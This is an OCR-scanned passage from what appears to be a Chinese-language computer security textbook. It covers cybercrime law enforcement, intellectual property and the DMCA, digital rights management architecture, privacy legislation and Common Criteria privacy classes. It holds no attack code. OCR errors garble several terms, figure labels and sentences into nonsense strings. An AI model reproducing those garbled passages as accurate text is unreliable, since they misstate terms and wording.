系统 ， 身 处 另 一 个 辖区 ， 甚 至 另 一 个 国家 。 因 此 同 远程 执法 机 构 的 协作 与 合作 的 缺乏 会 极 大 地 
妨碍 调查 工作 。 国 际 网 络 犯罪 公约 已 经 迈 出 了 令 人 鼓舞 的 第 一 步 。 该 公约 至 少 提出 了 一 组 共同 
的 犯罪 术语 和 一 个 协调 法 律 全 球 化 的 框架 。 


O 注意， 同一 行 中 后 面 三 列 中 的 数字 的 总 和 可 能 超过 100% ， 这 是 因为 一 个 受 访 者 可 能 报告 了 来 自 多 个 攻击 源 
的 多 个 事件 (例如 ， 一 个 受 访 者 遭受 过 来 自 内 部 和 外 部 的 拒绝 服务 攻击 )。 
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对 网 络 罪犯 (cybercriminal) 进行 有 效 制裁 的 案例 相对 缺乏 ， 这 导致 了 网 络 罪犯 数量 的 
增加 ， 犯 罪 者 变 得 更 为 大 胆 ， 而 且 犯 罪 活 动 也 趋 于 全 球 化 。 用 经 常 处 理 其 他 类 型 惯 犯 的 方法 
来 描述 网 络 罪犯 显得 很 困难 。 虽 然 网 络 罪犯 趋 于 年 轻 化 而 且 更 加 精通 计算 机 ， 但 他 们 的 行为 
特征 却 是 广泛 和 不 特定 的 。 而 且 ， 目 前 尚 没有 能 够 帮助 调查 员 指 出 可 能 的 嫌疑 犯 的 网 络 罪犯 数 
据 库 。 

网 络 犯罪 屡屡 得 手 ， 以 及 相对 较 少 的 成 功 执法 案例 ， 都 影响 着 网 络 犯 罪 受 害 者 (cyber- 
crime victims) 的 行为 。 像 执法 系统 一 样 ， 许 多 可 能 成 为 被 攻击 的 对 象 的 机 构 ， 没 有 在 技术 、 
硬件 、 人 力 资 源 方面 进行 足够 的 投资 以 避免 受到 攻击 。 由 于 对 执法 系统 缺乏 信心 ， 对 公司 声 
誉 和 民事 责任 的 担心 ， 导 致 报告 率 低下 。 低 报告 率 和 不 情愿 同 执法 人 员 合 作 的 情况 导致 执法 
工作 陷 人 困境 ， 这 将 形成 恶性 循环 。 


19.1.3 ”积极 配合 执法 


行政 管理 人 员 和 安全 管理 员 需 要 把 执法 系统 看 成 是 技术 的 、 物 理 的 和 人 为 因素 资源 之 外 
的 另 一 种 资源 和 工具 。 对 执法 系统 的 成 功利 用 更 多 是 依靠 人 际 关 系 能 力 而 不 是 技术 能 力 。 管 
理 者 需要 熟悉 犯罪 调查 流程 、 调 查 者 所 需要 的 信息 ， 以 及 受害 者 对 调查 工作 发 挥 积极 作用 的 
方式 。 


19.2 知识 产权 


美国 法 律 及 世界 上 各 种 法 律 体系 通常 将 财产 分 为 三 大 主要 类 型 . 

e 不 动产 (real property): 土地 及 永久 附属 于 土地 的 东西 ， 例 如 树木 、 建 筑 和 处 于 固定 状 
态 的 活动 住房 。 

© 私有 财产 (personal property): 私人 物品 、 可 移动 财产 和 商品 ， 例 如 汽车 、 银 行 账户 、 
薪水 、 股 票 、 小 生意 、 家 具 、 保 险 单 、 珠 宝 、 专 利 、 宠 物 和 赛季 棒球 门票 等 。 

e 知识 产权 (intellectual property): 由 人 类 的 知识 和 想法 组 成 的 任何 无 形 资产 。 包 括 软 件 、. 
数据 、 小 说 、 录 音 资料 、 新 型 捕 鼠 器 的 设计 或 者 疾病 的 治疗 方案 等 。 

本 节 内 容 主 要 是 关于 知识 产权 在 计算 机 安全 方面 的 问题 。 


19.2.1 知识 产权 的 类 型 


受 法 律 保护 的 知识 产权 通常 有 三 种 主要 类 
型 : 版 权 、 商 标 权 和 专利 。 法 律 保 护 针 对 的 是 侵权 
(infringement) 行为 ， 即 对 版 权 、 商 标 权 和 专利 权 所 








专利 
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者 (IP owner) 用 来 向 那些 侵权 者 寻求 民事 赔偿 的 权 

利 。 根 据 知识 产权 类 型 的 不 同 ， 侵 权 行为 可 能 会 有 所 Ataa 

不 同 ( 见 图 19-1). 使 用 或 者 仿造 
版 权 “ 版 权 法 保护 对 于 某 个 想法 的 有 形 或 者 确定 的 。 /” 。 版 权 

表达 ， 而 不 是 该 想法 本 身 。 如 果 以 下 条 件 全 部 满足 8， 未 经 授权 擅自 使 用 

创建 者 就 能 够 声明 其 版 权 ， 并 要 求 国家 政府 版 权 部 门 

为 其 授予 版 权证 书 : 图 19-1 知识 产权 侵权 


O 版 权 是 在 遵从 伯 恩 公约 ( Berne convention) 的 国家 内 自动 分 配给 新 研发 的 产品 的 ， 绝 大 多 数 国家 都 包含 在 
内 。 一 些 国 家 ,例如 美国 ,会 为 已 经 注册 的 产品 提供 额外 的 法 律 保护 。 
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e 所 提议 的 作品 是 原创 的 。 
© 作者 将 这 个 原创 的 想法 用 具体 形式 表现 了 出 来 ， 例 如 硬 拷 贝 ( 纸 )、 软 件 或 者 多 媒体 等 
形式 。 
可 能 获得 版 权 的 项 目 举例 包括 [BRAU01]: 
o 文学 作品 〈literary work): 小 说 、 非 小 说 类 散文 、 诗 歌 、 报 纸 和 报纸 文章 、 杂 志和 杂志 
文章 、 目 录 、 小 册子 、 广 告 (全 文 ) 和 编辑 物 如 商业 目录 。 
o 音乐 作品 (musical work): 歌曲 、 广 告 歌曲 和 乐器 。 
戏剧 作品 (dramatic work): 戏剧 、 歌 剧 和 小 品 。 
e 舞剧 和 舞台 舞蹈 作品 (pantomime and choreographic work): E., MAR, BEAM 
剧 作品 。 i 
e 画报 、 图 表 和 雕塑 作品 (pictorial, graphic, and sculptural work): 相片 、 海 报 、 地 图 、 绘 
画 、 图 画 、 形 象 艺术 、 广 告 宣 传 、 连 环 画 和 卡通 人 物 形象 、 动 物 玩 偶 、 雕 像 、 绘 画 和 
好 的 艺术 作品 。 
e 电影 和 其 他 视听 作品 (motion picture and other audiovisual work): 电影 、 纪 录 片 、 游 记 、 
培训 影片 和 录像 、 电 视 节目 、 电 视 广 告 和 互动 性 多 媒体 作品 。 
e 录音 制品 (sound recording): 音乐 、 声 音 或 者 歌词 的 录制 品 。 
o 建筑 设计 作品 (architectural work): 建筑 物 设 计 ， 可 以 是 建筑 规划 、 制 图 形式 的 ， 也 可 
以 是 建筑 物 本 身 。 
o 软件 相关 的 制品 (software-related work): 计算 机 软件 、 软 件 文档 和 手册 、 培 训 手 册 及 
其 他 手册 。 
版 权 所 有 者 拥有 以 下 独 有 的 权利 ， 这 些 权 利 受 到 保护 以 免 受 侵犯 : 
e 复制 权 (reproduction right): 允许 版 权 拥 有 者 复制 作品 。 
© 修改 权 (modification right): 也 称 为 派生 作品 权 ， 涉 及 以 修改 原作 品 的 方式 创作 出 新 的 
或 是 派生 的 作品 。 
e 发 行 权 (distribution right): 允许 版 权 拥有 者 公开 出 售 、 出 租 或 者 出 借 作品 副本 。 
公开 表演 权 (public-performance right): 主要 是 允许 现场 演出 。 
公开 展示 权 (public-display right): 允许 版 权 拥有 者 直接 或 者 通过 影片 、 幻 灯 片 或 电视 
图 像 手 段 公 开展 示 产 品 副 本 。 
专利 一 项 发 明 专利 是 授予 发 明 者 的 一 种 产权 。 用 美国 成 文法 和 专利 授权 本 身 的 话说 ， 专 
利 赋予 了 这 样 一 种 权利 ,，“ 该 权利 排除 了 他 人 在 美国 制造 、 使 用 、 出 售 或 者 贩卖 发 明 或 者 引进 
该 发 明 进入 美国 ”。 其 他 国家 在 相关 法 令 中 也 有 类 似 的 措辞 。 专 利 有 三 种 类 型 . 
e 实用 专利 (utility patent): 可 能 授予 那些 发 明 或 发 现任 何 新 的 有 用 的 流程 、 机 器 、 制 品 、 
物质 成 分 ， 或 者 对 它们 进行 新 的 有 用 的 改进 的 任何 人 。 
o 设计 专利 (design patent): 可 能 授予 那些 发 明了 制品 的 新 的 、 原 创 的 和 装饰 性 设计 的 任 
何人 。 
o 植物 专利 (plant patent): 可 能 授予 那些 发 明 或 发 现 并 且 无 性 繁殖 出 新 的 独特 的 植物 品 
种 的 任何 人 。 
一 项 计算 机 安全 领域 的 专利 实例 是 RSA 公 钥 密码 系统 。 从 1983 年 被 授权 直到 2000 年 专 
利 期 满 ， 专 利 的 拥有 者 网 络 安全 公司 (RSA Security) 有 权 向 每 个 应 用 RSA 算法 的 人 收取 费用 。 
商标 ”商标 是 被 用 来 在 商品 贸易 中 代表 商品 源 并 用 来 区 别 于 其 他 商品 的 一 个 词 、 名 称 、 符 
号 或 者 图 案 。 服 务 标签 ， 除 了 识别 和 区 分 的 是 服务 源 而 不 是 商品 外 ， 和 商标 是 相同 的 。 术 语 商 
标 和 标签 通常 是 指 商标 和 服务 标签 二 者 。 商 标 权 不 允许 他 人 使 用 相似 的 具有 混淆 作用 的 商标 ， 
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但 不 能 阻止 他 人 利用 具有 明显 不 同 的 标签 来 制造 相同 的 商品 或 者 出 售 相同 的 产品 或 服务 。 


19.2.2 与 网 络 和 计算 机 安全 相关 的 知识 产权 


一 些 形式 的 知识 产权 与 网 络 和 计算 机 安全 的 环境 有 关 。 我 们 在 这 里 介绍 几 种 最 突出 的 
形式 : 
© 软件 (software): 包括 由 商业 软件 开发 商 开发 的 程序 (例如 ,操作 系统 、 实 用 程序 和 应 
用 软件 ) 以 及 共享 软件 、 机 构 内 部 开发 供 内 部 使 用 的 专 有 软件 和 个 人 开发 的 软件 。 如 
果 有 必要 ， 以 上 这 些 软件 的 版 权 都 可 以 受到 保护 。 在 某 些 情况 下 ， 也 适用 专利 保护 。 
© 数据 库 (database): 数据 库 可 能 包括 因为 具有 潜在 商业 价值 而 收集 并 组 织 的 数据 。 经 济 
预测 数据 库 就 是 其 中 的 一 个 例子 。 这 种 数据 库 可 能 要 受 版 权 保护 。 
e 数字 内 容 (digital content): 包括 视频 文件 、 音 频 文件 、 多 媒体 、 课 件 、 网 站 内 容 和 任 
何其 他 的 原创 数字 作品 ， 这 类 数字 作品 能 用 计算 机 或 者 其 他 数字 设备 以 某 种 方式 展现 
出 来 。 
o 算法 (algorithm): 取得 专利 的 算法 的 例子 是 RSA 公 钥 密码 系统 ， 前 面 我 们 已 经 提 过 。 
本 书 中 讨论 的 计算 机 安全 技术 ， 提 供 了 对 上 面 提 到 的 一 些 类 别 知识 产权 的 保护 。 例 如 ， 统 
计数 据 库 的 目的 是 在 没有 用 户 访问 原始 数据 的 情况 下 也 能 够 产生 统计 结果 。 在 第 5 章 里 我 们 讨 
论 了 保护 原始 数据 的 各 类 技术 。 另 一 方面 ， 如 果 用 户 被 允许 访问 诸如 操作 系统 或 者 应 用 程序 的 
软件 ， 即 使 没有 获得 许可 证 ， 用 户 也 可 能 制作 目标 镜像 并 分 发 副本 或 者 在 计算 机 上 使 用 它们 。 
在 这 些 情 况 下 ， 提 供 保护 的 恰当 工具 是 法 律 制 裁 而 不 是 技术 性 的 计算 机 安全 措施 。 


19.2.3 ”数字 千年 版 权 法案 


美国 数字 千年 版 权 法 案 (U.S. Digital Millennium Copyright Act, DMCA) 对 美国 和 全 世界 
的 数字 内 容 版 权 保 护 都 有 着 深远 影响 。DMCA 是 为 了 执行 世界 知识 产权 条 约 ( WIPO) 而 设计 
的 ，1996 签署 ，1998 FRE ARE. SL, DMCA 加 强 了 对 数字 形式 的 已 获 版 权 的 资料 的 
保护 。 

DMCA 鼓励 版 权 所 有 者 使 用 技术 措施 来 保护 版 权 产品 。 这 些 措施 可 以 归纳 为 两 类 : 一 类 
是 阻止 访问 产品 的 措施 ， 另 一 类 是 禁止 复制 产品 的 措施 。 而 且 ， 法 律 禁止 企图 绕 过 这 些 措施 的 
行为 。 特 别 地 ， 法 律 规定 “不 允许 任何 人 绕 过 对 受到 该 法 案 保护 的 作品 进行 有 效 访问 控制 的 技 
术 措 施 。” 这 个 条 款 的 其 他 影响 是 ， 禁 止 几 乎 所 有 对 内 容 进 行 未 授权 的 解密 。 此 法 律 还 禁止 生 
产 、 发 行 ， 或 者 销售 能 够 攻击 加 密 方法 的 产品 、 服 务 和 设备 ， 其 中 加 密 方法 用 于 阻止 未 经 版 权 
所 有 者 授权 对 产品 进行 的 访问 或 者 复制 。 刑 事 处 罚 和 民事 处 罚 适 用 于 试图 规避 技术 措施 和 协助 
这 种 规避 的 行为 。 

某 些 活动 在 DMCA 和 其 他 版 权 法 条 款 中 是 可 以 得 到 豁免 的 ， 包 括 以 下 几 项 : 

o 正当 使 用 (fair use): 这 个 概念 没有 固定 的 定义 。 其 目的 是 允许 他 人 根据 某 些 特殊 的 目 
的 执行 、 展 示 、 引 用 、 复 制 和 对 作品 部 分 内 容 进 行 分 发 。 这 些 目 的 包括 评审 、 评 论 和 
讨论 受 版 权 保护 的 作品 等 。 

o 逆向 工程 (reverse engineering): 如 果 用 户 有 权 使 用 程序 的 副本 ， 如 果 逆 向 工程 的 目的 
不 是 复制 程序 的 功能 而 是 取得 它 的 互 操作 性 ， 软 件 产 品 的 逆向 工程 是 可 以 允许 的 。 

© MERR (encryption research): HIT “FE” MERR. EKE, AMA 
免 允 许 尝试 破解 加 密 技术 以 促进 加 密 技术 的 发 展 。 

e ZER (security testing): 这 是 经 版 权 所 有 者 或 者 操作 员 同 意 对 计算 机 或 者 网 络 进行 
的 访问 ， 目 的 是 进行 善意 的 测试 、 研 究 或 者 修补 某 个 安全 漏洞 或 缺陷 。 
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e 个 人 隐私 (personal privacy): 如 果 绕 过 技术 措施 是 防止 因 访 问 而 导致 个 人 识别 信息 或 
记录 被 泄露 的 唯一 合理 的 方法 ， 那 么 通常 这 是 允许 的 。 
尽管 各 种 铜 免 被 写 进 法 律 ， 但 是 ,该 法 律 仍然 抑制 了 正当 的 安全 和 加 密 技术 的 研究 ， 这 引 
起 了 相当 的 关注 ， 特 别 是 在 研究 和 学 术 团体 中 。 这 些 团 体 认为 DMCA 抑制 了 创新 和 学 术 自 由 ， 
而 且 威 胁 着 开源 软件 的 发 展 [ACM04 ]。 


19.24 ”数字 版 权 管理 


数字 版 权 管理 (DRM) 是 指 确保 数字 版 权 拥有 者 能 清楚 地 被 识别 并 对 其 作品 按 规定 收取 报 
酬 的 体制 和 程序 。 体 制 和 程序 也 可 以 对 数字 对 象 的 使 用 附加 进一步 的 限制 ， 例 如， 禁止 印刷 或 
禁止 进一步 的 发 行 。 

DRM 标准 或 者 体系 结构 不 是 独立 的 。DRM 包含 多 种 知识 ne dyes 
安全 可 信任 的 自动 化 服务 来 控制 内 容 的 发 布 和 使 用 。 总 的 来 说 ， 目 标 是 要 为 完整 的 内 容 管 
命 周 期 (创作 、 他 人 后 来 的 贡献 、 访 问 、 发 行 、 使 用 ) 提供 机 制 ， 人 
管理 。 

DRM 系统 应 该 实现 以 下 目标 : 

1. 提供 持久 的 内 容 保 护 以 避免 他 人 未 经 授权 访问 数字 内 容 ， 限 制 对 那些 仅仅 经 过 一 定 授权 
的 访问 。 

2. 支持 各 种 数字 内 容 类 型 (例如 ， 音 乐 ea >» 受 保护 的 内 容 
文件 、 视 频 流 、 数 字 书 籍 、 图 像 )。 Nt 

3. 支持 在 多 种 平台 上 使 用 内 容 (例如 ， 
PC、PDA、iPod、 移 动 电话 )。 

4. 支持 在 各 种 媒体 上 发 行内 容 ， 包 括 
CD-ROM、DVD 和 flash 存储 。 

图 19-2 基于 [LIU03], 从 DRM 体制 中 
主要 用 户 的 角度 ， 给 出 了 一 个 典型 的 DRM 
模型 : 

e 内 容 提供 者 (content provider): 拥 

有 内 容 的 数字 版 权 并 且 想 要 保护 这 
些 权 利 。 这 样 的 例子 是 音乐 唱片 公 
司 和 电影 工作 室 。 =z 信息 流 

° a (distributor): 提供 发 行 渠 a 

， 如 可 以 是 一 家 网 上 商店 或 者 网 SS OM ee? 
ety 例如 ， 网 上 经 销 商 接受 内 容 供应 商 的 数字 内 容 并 且 创建 了 一 个 目录 网 页 用 
于 展示 内 容 以 帮助 销售 。 
消费 者 (consumer): 使 用 系统 通过 检索 可 下 载 的 内 容 或 者 使 用 分 配 渠 道 串 流 内 容 的 方 
法 访问 数字 内 容 ， 然 后 为 数字 许可 证 付费 。 消 费 者 使 用 的 播放 器 / 查看 器 应 用 程序 负 
责 向 票据 交换 所 提交 许可 申请 和 加 强 内 容 使 用 权 。 
票据 交换 所 (clearinghouse): 处 理 为 消费 者 颁发 数字 许可 证 过 程 的 财务 事务 ， 向 内 容 
供应 者 支付 版 税 和 向 经 销 商 支付 发 行 费 。 票 据 交换 所 也 负责 为 每 位 消费 者 记录 许可 证 
的 使 用 情况 。 

在 这 个 模型 中 ， 经 销 商 不 需要 强制 执行 访问 权 。 相 反 ， 内 容 供应 商 通 过 使 消费 者 必须 从 和 票 
据 交换 所 购买 数字 许可 证 和 接 人 能 力 的 方式 来 保护 内 容 。 票 据 交换 所 通过 商议 由 内 容 供应 商 提 


a 受 保护 
E, 二 HAR 
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供 的 使 用 规则 来 决定 哪些 访问 是 被 允许 的 ， 以 及 特定 访问 类 型 的 费用 。 由 于 票据 交换 所 征收 了 
费用 ， 他 应 该 对 内 容 供 应 商 和 经 销 商 讲 信誉 。 

图 19-3 展示 了 一 个 支持 DRM 功能 的 通用 体系 结构 。 参 与 者 可 以 以 三 种 角色 对 系统 进行 
访问 。 版 权 所 有 者 ( right holder) 应 是 内 容 提供 者 ， 负 责 内 容 创 建 和 取得 内 容 的 版 权 。 服 务 提 
供 者 (service provider) 包括 经 销 商 和 票据 交换 所 。 消 费 者 (consumer) 是 那些 为 特定 用 途 而 购 
买 内 容 访问 权 的 人 。DRM 系统 提供 了 针对 服务 的 系统 接口 : 

e 身份 管理 (identity management): 对 实体 进行 唯一 识别 的 机 制 ， 例 如 参与 者 和 内 容 。 

e 内 容 管 理 (content management): 管理 内 容 生存 方式 所 需要 的 过 程 和 功能 。 

© 权利 管理 (right management) : 管理 版 权 、 版 权 拥有 者 和 相关 的 需求 所 需要 的 过 程 和 

功能 。 





19-3 DRM 系统 结构 


在 这 些 管理 模块 之 下 是 一 组 常用 功能 。 安 全 /加 密 ( security/encryption) 模块 提供 对 内 容 
进行 加 密 和 签署 许可 协议 的 功能 。 身 份 管理 服务 利用 认证 /授权 (authentication/authorization ) 
功能 来 识别 关系 中 的 所 有 当事人 。 使 用 这 些 功能 的 身份 管理 服务 包括 以 下 项 目 : 

e 唯一 的 当事人 标识 符 分 配 

e 用 户 概况 和 偏好 

e 用 户 设 备 管理 

e LATE 

开具 账单 /支付 (billing/payment) 功能 处 理 消费 者 使 用 费 的 征收 和 在 版 权 所 有 者 和 经 销 商 
之 间 付 款 的 分 配 。 交 付 (delivery) 功能 负责 将 内 容 交 付 给 消费 者 。 


19.3 ”隐私 


一 个 与 计算 机 安全 有 着 许多 重生 的 问题 是 隐私 问题 。 一 方面 ， 由 于 执法 系统 、 国 家 安全 和 
经 济 刺激 的 激发 ， 收 集 与 储存 在 信息 系统 中 的 个 人 信息 的 规模 和 相互 关联 性 有 了 迅速 的 增长 。 
其 中 经 济 刺激 可 能 是 主要 驱动 力 。 在 全 球 信息 经 济 中 ,个 体 信息 的 收集 很 可 能 是 最 具 经 济 价值 
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的 电子 资产 [JUDY14]。 另 一 方面 , 个 人 已 经 逐渐 地 意识 到 有 关 其 生活 和 活动 的 个 人 信息 和 隐 
私 如 今 可 以 在 什么 样 的 程度 上 被 政府 机 构 、 企 业 甚至 Internet 用 户 访问 和 获取 。 

人 们 对 个 人 隐私 已 经 或 者 可 能 被 威胁 的 程度 的 关注 ， 使 得 一 系列 的 法 律 和 技术 方法 被 引入 
用 以 加 强 隐私 保护 。 


19.3.1 ”隐私 权 法 律 和 规章 


相当 数量 的 国际 机 构 和 国家 政府 部 门 已 经 引入 法 律 和 规章 来 保护 个 人 隐私 。 本 小 节 ， 我 们 
来 分 析 一 下 最 早 的 两 部 法 案 。 
欧盟 数据 保护 指令 1998 年 ， 欧 盟 采用 数据 保护 指令 ， 用 以 (1 ) 在 处 理 个 人 信息 时 ， 确 
保 成 员 国 能 够 保护 基本 的 隐私 权 ; (2) 防止 成 员 国 限制 个 人 信息 在 欧盟 内 自由 流动 。 该 指令 本 
身 并 不 是 法 律 ， 但 要 求 成 员 国 在 制定 法 律 时 包含 其 条 款 。 该 指令 是 围绕 着 以 下 个 人 信息 使 用 原 
则 而 组 织 的 : 
© 通知 (notice): 机 构 必须 通知 个 人 ， 正 在 收集 哪些 个 人 信息 、 这 些 信息 的 用 途 ， 以 及 个 
人 拥有 哪些 选择 。 
同意 (consent): 个 人 必须 有 权力 选择 是 否 以 及 如 何 由 第 三 方 使 用 个 人 信息 ， 或 者 将 个 
人 信息 透露 给 第 三 方 。 在 没有 表示 人 允许 的 情况 下 ， 个 人 有 权 拒 绝对 敏感 信息 的 收集 或 
使 用 ， 包 括 种 族 、 健 康 、 联 盟 成 员 资格 、 信 和 仰 等 。 
e 一 致 性 ( consistency) : 只 有 在 与 发 给 指定 数据 主体 的 通知 中 的 条 款 一 致 ， 并 且 与 数据 
主体 关于 数据 使 用 所 做 出 的 选择 一 致 的 情况 下 ， 机 构 才 可 以 使 用 个 人 信息 。 
访问 (access): 个 人 必须 拥有 权利 和 能 力 访问 其 信息 并 且 能 够 改正 、 修 改 或 者 删除 信 
息 的 任何 部 分 。 
安全 (secutity) : 机 构 必 须 提供 足够 的 安全 措施 ， 包 括 使 用 技术 手段 和 其 他 方法 ， 来 保 
护 个 人 信息 的 完整 性 和 机 密 性 。 
o 转 递 (onward transfer): 接收 个 人 信息 的 第 三 方 必须 提供 与 机 构 同 等 级 的 隐私 保护 。 
© 执行 (enforcement) : 当 机 构 不 遵守 法 律 时 ， 该 指令 授予 数据 主体 隐私 诉讼 权 。 男 外 ， 
欧盟 各 成 员 国 都 拥有 一 个 与 隐私 权 执 法 有 关 的 执法 机 构 。 
美国 隐私 权 倡议 ”美国 采用 的 第 一 个 全 面 的 隐私 权 立 法 是 1974 年 的 隐私 权 法 案 ， 它 是 用 
来 处 理由 联邦 政府 机 构 收集 和 使 用 的 个 人 信息 的 。 该 法 令 旨 在 : 
1. 允许 个 人 决定 哪些 与 其 相关 的 记录 被 收集 、 维 护 、 使 用 或 者 散布 。 | 622 
2. 允许 个 人 禁止 在 未 经 允许 的 情况 下 将 为 某 一 目的 获取 的 记录 应 用 于 其 他 目的 。 
3. 允许 个 人 访问 与 其 有 关 的 记录 ， 并 且 对 这 些 记录 做 适当 的 改正 和 修订 。 
4. 确保 机 构 收 集 、 维 护 和 使 用 个 人 信息 时 ， 使 用 适当 的 方法 ， 确 保 信 息 是 最 新 的 、 充 足 
的 、 相 关 的 、 非 滥用 的 。 
5. 为 那些 个 人 信息 没有 依据 该 法 案 使 用 的 人 创建 隐私 诉讼 权 。 
如 同 所 有 的 隐私 权 法 律 和 规章 一 样 ， 在 该 法 案 的 最 后 也 规定 了 一 些 例外 和 附加 条 件 ， 例 
a, 刑事 调查 、 涉 及 国家 安全 的 问题 以 及 相抵 触 的 个 人 隐私 权 之 间 的 冲突 。 
尽管 1974 年 的 隐私 权 法 案 包 含 政 府 记 录 ， 美 国 还 是 制定 了 一 些 其 他 法 律 来 涵盖 其 他 领域 ， 
包括 : 
e 银行 和 财务 记录 (banking and financial record): 个 人 银行 信息 由 若干 法 律 以 多 种 方式 进 
行 保护 ， 包 括 最 近 颁 布 的 《金融 服务 现代 化 法 案 》。 
e 信用 报告 (credit report):《 公 平 信用 报告 法 案 》 赋 予 个 人 一 定 的 权利 ， 给 予 信用 报告 机 
构 一 定 的 义务 。 
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e 医疗 与 健康 保险 记录 (medical and health insurance record): 处 理 私 人 病历 隐私 的 各 种 法 
律 已 经 实施 了 数 十 年 。《 健 康 保险 携带 和 责任 法 案 》( HIPPA) 为 病人 赋予 了 新 的 保护 和 
访问 他 们 自己 的 健康 信息 的 权利 。 

o 儿童 隐私 (children’s privacy) :《 儿童 在 线 隐私 保护 法 案 》 限 制 网 上 机 构 收 集 13 岁 以 下 
儿童 的 数据 信息 。 

e 电子 通信 (electronic communication) :《 电 子 通信 隐私 权 法 案 》 通 常 禁止 在 传输 阶段 未 
经 授权 蓄意 窃听 电子 通信 线路 ， 也 禁止 对 用 于 电子 存储 的 线路 和 电子 通信 设备 的 非 授 
权 访 问 。 


19.3.2 ”机 构 的 回应 
机 构 需 要 部 署 管 理 控制 和 技术 措施 来 遵守 有 关 隐 私 权 的 法 律 法 规 ， 同 时 还 要 实施 有 关 员 工 
隐私 的 公司 策略 。ISO 27002 (信息 安全 管理 实施 细则 ) 对 此 要 求 进行 了 如 下 陈述 : 


ISO 27002: 数据 保护 和 个 人 信息 隐私 . 
应 该 制定 和 执行 一 个 机 构 的 数据 保护 和 隐私 策略 。 应 该 将 这 项 策略 传达 给 与 处 理 个 人 信 
623] | 息 相 关 的 所 有 人 。 遵 照 这 项 策略 和 所 有 相关 的 数据 保护 的 法 律 法 规 ， 需 要 适当 的 管理 结构 和 


控制 。 通 常 ， 最 好 的 实现 方法 是 委任 一 个 责任 人 ， 例 如 数据 保管 员 ， 他 应 该 为 管理 者 、 用 户 
和 服务 供应 商 提供 ， 有 关 其 各 自 应 该 承担 的 职责 和 应 该 遵从 的 具体 的 实施 程序 的 指导 。 处 理 
个 人 信息 和 保证 知晓 数据 保护 原则 的 责任 ， 应 该 依据 相应 的 法 律 法 规 来 进行 。 应 当 采 取 适 当 
的 技术 和 组 织 措施 来 保护 个 人 信息 。 





源 自信 息 安全 论坛 [ISF12] 的 信息 安全 良好 实践 标准 提供 了 一 个 极 好 的 有 关机 构 实施 隐 
私 控制 时 应 该 注意 的 事项 的 详细 列表 。 这 份 材料 参见 附录 H.4。 


19.3.3 ”计算 机 使 用 的 隐私 问题 


通用 标准 规范 [CCPS12b ] 包括 了 隐私 类 别 中 一 系列 功能 性 要 求 的 定义 ， 其 应 该 在 一 个 可 
信 系 统 上 实施 。 保 密 功 能 的 目的 是 为 用 户 提供 一 种 保护 ， 防 止 其 他 用 户 发 现 和 误 用 其 身 
份 。 这 个 规范 ， 对 如 何 将 隐私 支持 功能 设计 成 计算 机 系统 的 一 部 分 ， 具 有 指导 作用 。 图 
19-4 中 ， 将 隐私 划分 为 四 个 主要 方面 ， 其 中 每 个 方面 有 一 个 或 者 多 个 特定 的 功能 : 

e 匿名 (anonymity): 保证 用 户 在 不 泄露 身份 的 情况 下 就 可 以 使 用 资源 和 服务 。 具 体 来 说 ， 
这 意味 着 其 他 用 户 或 主体 不 能 确定 与 主体 (例如 ， 进 程 或 用 户 组 ) 或 操作 绑 定 的 用 户 身 
份 。 进 而 意味 着 系统 不 要 求 用 户 的 实名 。 匿 名 与 绑 定 基于 计算 机 的 用 户 ID 的 授权 和 访 
问 控制 的 功能 并 不 冲突 。 
化 名 (pseudonymity) : 保证 用 户 不 泄露 身份 就 可 以 使 用 资源 和 服务 ， 但 是 仍 可 以 对 使 
用 做 出 说 明 。 系 统 将 提供 一 个 别名 以 阻止 其 他 用 户 识 别 其 真实 身份 ， 但 是 系统 能 够 从 
其 分 配 的 别名 中 识别 用 户 的 身份 。 
不 可 链接 性 ( unlinkability) : 保证 用 户 可 以 使 用 多 个 资源 或 者 服务 ， 而 其 他 人 不 能 将 这 
些 使 用 情况 联系 在 一 起 。 
不 可 观察 性 ( unobservability) : 保证 用 户 可 以 使 用 资源 或 者 服务 ， 而 没有 人 他人， 特别 
是 没有 第 三 方 用 户 ， 能 够 观察 到 正在 使 用 的 资源 或 者 服务 。 不 可 观察 性 要 求 用 户 或 者 
主体 不 能 够 确定 一 项 操作 是 否 正在 被 执行 。 信 息 分 配 影响 不 可 观察 性 要 求 安 全 功能 提 
供 具体 机 制 以 避免 系统 内 隐私 相关 的 信息 过 分 集中 。 不 要 求 资料 的 不 可 观察 性 要 求 安全 
624 功能 不 用 设法 得 到 与 隐私 有 关 、 可 能 用 于 威胁 不 可 观察 性 的 信息 。 授 权 用 户 的 可 观察 性 
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要 求 安全 功能 提供 一 个 或 者 多 个 授权 用 户 ， 这 些 用 户 具 有 观察 资源 和 服务 使 用 情况 的 


能 力 。 
FERRE 
| | 
别名 化 名 


不 可 链接 性 


:信息 分 配 影响 不 可 观察 性 
;授权 用 户 的 可 观察 性 
图 19-4 通用 隐私 类 别 标准 分 解 


注意 ; 通用 标准 规范 主要 涉及 关于 个 人 对 计算 机 资源 使 用 的 隐私 ， 而 不 是 关于 其 个 人 信息 
的 隐私 。 


19.3.4 ”隐私 和 数据 监管 


国土 安全 和 反 汐 怖 主义 的 要 求 已 经 给 个 人 隐私 带 来 了 新 的 威胁 。 执 法 和 情报 机 构 对 使 用 数 
据 监 管 技 术 完 成 他 们 的 任务 方面 持 非 常 积极 的 态度 。 另 外 ， 一 些 保密 机 构 正 在 利用 信息 技术 的 
发 展 趋势 来 提高 他 们 构建 个 人 详细 档案 的 能 力 ， 包 括 nemet 应 用 的 扩展 、 电 子 支付 方法 的 增 
加 、 移 动 通信 近乎 普及 的 使 用 、 普 适 计算 、 传 感 器 网 ， 等 等 。 
当政 府 和 非 政府 机 构 寻 求 了 解 尽 可 能 多 的 个 人 信息 时 ， 就 需要 政策 和 技术 方法 来 保护 个 人 
隐私 。 就 技术 方法 来 说 ， 对 信息 系统 隐私 保护 的 要 求 能 够 在 数据 库 安 全 的 背景 下 解决 。 也 就 是 
说 ， 适 用 于 隐私 保护 的 方法 涉及 为 数据 库 安 全 开发 的 技术 方法 。 这 些 在 第 5 章 中 已 进行 了 详细 
的 讨论 。 
[POPP06] 给 出 了 一 份 将 数据 库 安全 的 方法 用 于 保护 个 人 隐私 的 建议 。 该 保密 装置 是 具有 
防 算 改 功能 的 密码 保护 设备 ， 它 被 设置 在 数据 库 和 访问 接口 之 间 ， 类 似 于 防火 墙 或 者 人 侵 防 护 
设备 。 该 设备 实现 隐私 保护 功能 ， 包 括 验证 用 户 的 访问 许可 权 和 证 书 并 且 创 建 审计 日 志 。 该 装 
置 的 其 中 一 些 特定 功能 包括 : 
e 数据 转换 (data transformation) : 该 功能 是 通过 对 部 分 数据 编码 或 者 加 密 来 保护 隐私 的 ， 
